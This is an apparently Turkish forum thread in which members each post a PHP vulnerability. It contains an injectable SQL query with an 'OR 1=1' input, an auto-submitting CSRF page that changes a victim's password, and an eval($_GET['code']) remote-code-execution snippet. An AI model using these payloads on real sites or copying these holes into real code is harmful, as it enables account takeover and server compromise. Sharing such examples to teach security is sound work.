Herkes Bir Tane PHP Güvenlik Açığı Söylesin :)

Güvenlik Açığı:SQL Enj.

Örnek Kod:
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = $id";

Kullanım Örneği: /index.php?id=1 OR 1=1

Bu formatta herkes aklına geleni söylesin Sunucu taraflı örneklerde verebilirsiniz kolay gelsin...

Backdoor

CSRF token cidden çok ciddi açıktır çoğu modern uygulama ve framework koruma sağlar bunla ilgili

Edit:
<html>
<body onload="document.forms[0].submit()">
<form action="https://hedefsite.com/change-password" method="POST">
<input type="hidden" name="new_password" value="hacked123">
</form>
</body>
</html>

Bu sayfa, kullanıcı hedef siteye giriş yapmışsa (çerezleri tarayıcıda hala geçerliyse), kullanıcının şifresini saldırganın belirlediği şekilde değiştirebilir

Biraz daha açar mısınız konunun amacına uygun olarak

Çok güzel örneklemeli bir şekilde yazabilir misiniz yada konuyu editleyebilirsiniz teşekkürler.

Yazdığınız şey MySQL ile alakalı; PHP ile değil.

Dillerde açık byte level olur.

Lütfen konsepte uyalım, konuyu editleyip bir tane açık yazar mısınız iyi forumlar sevgiler...

Merhaba hocam,
En tehlikelisi ve yapılması zor olan RCE'dir.

<?php
eval($_GET['code']);
?>

Tam da bunu bekliyordum PHP'için en tehlkeli kod budur gerçekten hiç kuşkusuz bütün sunucuyu darmadağan eder R10+ hak ettiniz